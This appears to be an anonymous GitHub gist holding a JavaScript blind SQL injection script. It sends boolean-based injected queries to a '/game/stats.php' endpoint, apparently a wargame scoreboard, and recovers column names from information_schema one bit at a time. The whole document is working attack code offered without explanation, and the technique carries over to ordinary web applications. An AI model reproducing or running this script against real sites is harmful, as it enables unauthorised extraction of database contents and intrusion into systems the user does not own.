Created
March 17, 2016 18:35
-
-
Save anonymous/a4abadcf19982a51d341 to your computer and use it in GitHub Desktop.
Revisions
-
Anonymous created this gist
Mar 17, 2016 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,33 @@ function pwn(params){ var http = new XMLHttpRequest(); var url = "/game/stats.php?action=psolve"; http.open("POST", url, false); http.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http.send("action=showpsolve&problem_no="+params+"-- -"); if(http.response.indexOf("you wanna be first") == -1){ return true; } else return false; } var tables = ""; var value = ""; var tmp = 0; for(var k=0;k<10;k++){ var value = ""; for(var i=1;i<40;i++){ var tmp = 0; for(var j=1;j<128;j*=2){ if(pwn("1 and (select 1 union select 0 != (ascii(substr((select column_name from information_schema.columns where table_name=0x70726f626c656d73 limit "+k+",1),"+i+",1))%26"+j+"))")){ tmp += j; } } value += String.fromCharCode(tmp); console.log(value); if(tmp == 0) break; } console.log("Table Name : "+value); if(value == "") break; tables += value; tables += ", "; } alert("Pwn End"); console.log("Table List : "+tables);